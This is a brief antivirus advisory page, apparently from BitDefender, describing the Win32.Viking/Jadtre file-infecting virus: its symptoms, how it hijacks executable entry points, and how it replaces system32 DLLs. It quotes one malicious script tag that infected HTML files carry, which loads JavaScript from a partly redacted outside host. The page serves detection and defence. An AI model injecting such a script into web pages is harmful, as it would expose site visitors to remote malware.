Home / malwarePDF  

Win32.Viking.Gen


First posted on 21 November 2011.
Source: BitDefender

Aliases :

Win32.Viking.Gen is also known as Win32.Jadtre.Gen.

Explanation :

You may be infected with Viking/Jadtre if:

- there is a hidden autorun.inf created on a removable device, alongside a hidden recycle.{random-string} folder and another hidden folder with a random name.

- the hosts file has been modified without the user’s consent:

- the hosts file does not include its original comments.

- the hosts file has been emptied of all the IPs you may have added to it, other than the localhost IP.

Viking/Jadtre infects executable files by creating its own section and modifying the entry point so that the virus is executed first, allowing itself to spread. After that, the executable is run normally (except for when it is an installer, because some versions of Viking/Jadtre compromise installers).

Some versions of Viking/Jadtre also infect htmls by appending a malicious script:

<script language=javascriptsrc=http://www.ha[removed].com/js/w.js></script>



The virus deletes dlls from the system32 folder and copies itself in their place usingthe same name(ex.: appmgmts.dll, qmgr.dll, ntmssvc.dll) and sometimes creates a dll called dmutilio.dll. It also creates .sys files in system32 with random names and registers them as services.

Last update 21 November 2011

 

TOP